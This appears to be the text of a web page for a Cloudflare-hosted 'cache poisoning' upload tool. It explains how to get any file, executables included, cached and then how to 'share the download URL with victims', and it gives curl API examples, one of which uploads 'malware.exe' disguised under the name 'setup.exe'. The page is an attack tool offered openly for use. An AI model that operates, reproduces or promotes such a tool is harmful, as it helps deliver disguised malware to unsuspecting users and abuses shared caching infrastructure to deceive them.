📁 Cache Poisoning File Upload

Upload videos, PDFs, images, or any file to poison the Cloudflare cache.

⚠️ How Cache Poisoning Works:

  1. Upload any file (video, PDF, image, etc.)
  2. File gets cached by Cloudflare for 1 week
  3. File is NOT persisted to storage (R2/KV)
  4. Share the download URL with victims
  5. They receive the cached file (not from URL parameters)
  6. Different users get same poisoned file from cache

📋 Supported File Types:

🎬
Videos (MP4, AVI, etc.)
📄
PDF Documents
🖼️
Images (JPG, PNG, GIF)
🎵
Audio (MP3, WAV)
📝
Text Files
🗜️
Archives (ZIP, RAR)
📊
Documents (DOC, XLS)
🔧
Executables
📁

Click or Drag & Drop Files Here

Upload videos, PDFs, images, or any file to poison the cache

Max file size: Limited by Cloudflare Workers (typically ~100MB)

Selected File:

Name:

Size:

Type:

🔧 API Usage (for automation):

# Upload video file
curl -X POST -F "file=@video.mp4" \
  "https://YOUR-SITE.pages.dev/poison-upload"

# Upload PDF file  
curl -X POST -F "file=@document.pdf" \
  "https://YOUR-SITE.pages.dev/poison-upload"

# Upload with custom filename
curl -X POST -F "file=@malware.exe" \
  "https://YOUR-SITE.pages.dev/poison-upload?name=setup.exe"
        

← Back to main page